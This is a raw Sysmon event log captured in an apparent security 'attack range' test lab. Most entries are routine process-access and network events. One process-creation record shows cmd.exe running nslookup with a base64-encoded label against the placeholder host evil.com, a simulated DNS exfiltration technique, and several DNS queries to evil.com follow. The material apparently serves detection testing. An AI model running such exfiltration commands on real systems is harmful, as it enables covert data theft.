14:16:46.994{2E1864BB-17CE-629A-3142-000000005F02}80285472C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-3242-000000005F02}5960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.994{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.994{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.994{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.994{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.994{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3242-000000005F02}5960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.994{2E1864BB-17CE-629A-3042-000000005F02}79447592C:\Windows\system32\cmd.exe{2E1864BB-17CF-629A-3242-000000005F02}5960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.004{2E1864BB-17CF-629A-3242-000000005F02}5960C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-3042-000000005F02}7944C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldtwi.tmp 2>&1 10341000x800000000000000043971Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.812{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-17CF-629A-0D07-000000006002}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043970Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043969Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043968Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043967Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043966Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043965Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043964Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043963Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043962Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043961Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.812{0A5DF930-E35B-6299-0500-000000006002}4121840C:\Windows\system32\csrss.exe{0A5DF930-17CF-629A-0D07-000000006002}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043960Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.812{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-17CF-629A-0D07-000000006002}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043959Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.813{0A5DF930-17CF-629A-0D07-000000006002}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000043958Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:44.703{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52328-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043957Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:47.015{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1BCF25E71447E9889BCAA6339402907,SHA256=47A1226FA2AE92FE9ABD4A4ABC37456985682F20FD4B0EF2A759AD418E538CA4,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000205081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.182{00000000-0000-0000-0000-000000000000}5912evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000205080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.104{00000000-0000-0000-0000-000000000000}7580evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000205079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.020{00000000-0000-0000-0000-000000000000}5364evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000205078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.931{00000000-0000-0000-0000-000000000000}5752evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000205077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.832{00000000-0000-0000-0000-000000000000}7328evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000205076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.739{00000000-0000-0000-0000-000000000000}2256evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000205075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.928{00000000-0000-0000-0000-000000000000}5752<unknown process>-udpfalsefalse127.0.0.1-53175-false127.0.0.1-53domain 354300x8000000000000000205074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.928{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53175- 354300x8000000000000000205073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.928{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53175- 354300x8000000000000000205072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.928{00000000-0000-0000-0000-000000000000}5752<unknown process>-udptruefalse127.0.0.1-53175-false127.0.0.1-53domain 354300x8000000000000000205071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.830{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53174- 354300x8000000000000000205070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.830{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53174- 354300x8000000000000000205069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.830{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53173- 354300x8000000000000000205068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.830{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53173- 354300x8000000000000000205067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.830{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53172- 354300x8000000000000000205066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.830{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53172- 354300x8000000000000000205065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.830{00000000-0000-0000-0000-000000000000}7328<unknown process>-udptruefalse127.0.0.1-53172-false127.0.0.1-53domain 354300x8000000000000000205064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.737{00000000-0000-0000-0000-000000000000}2256<unknown process>-udpfalsefalse127.0.0.1-53171-false127.0.0.1-53domain 354300x8000000000000000205063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.737{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53171- 354300x8000000000000000205062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.737{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53171- 354300x8000000000000000205061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.737{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53170- 354300x8000000000000000205060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.737{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53170- 354300x8000000000000000205059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 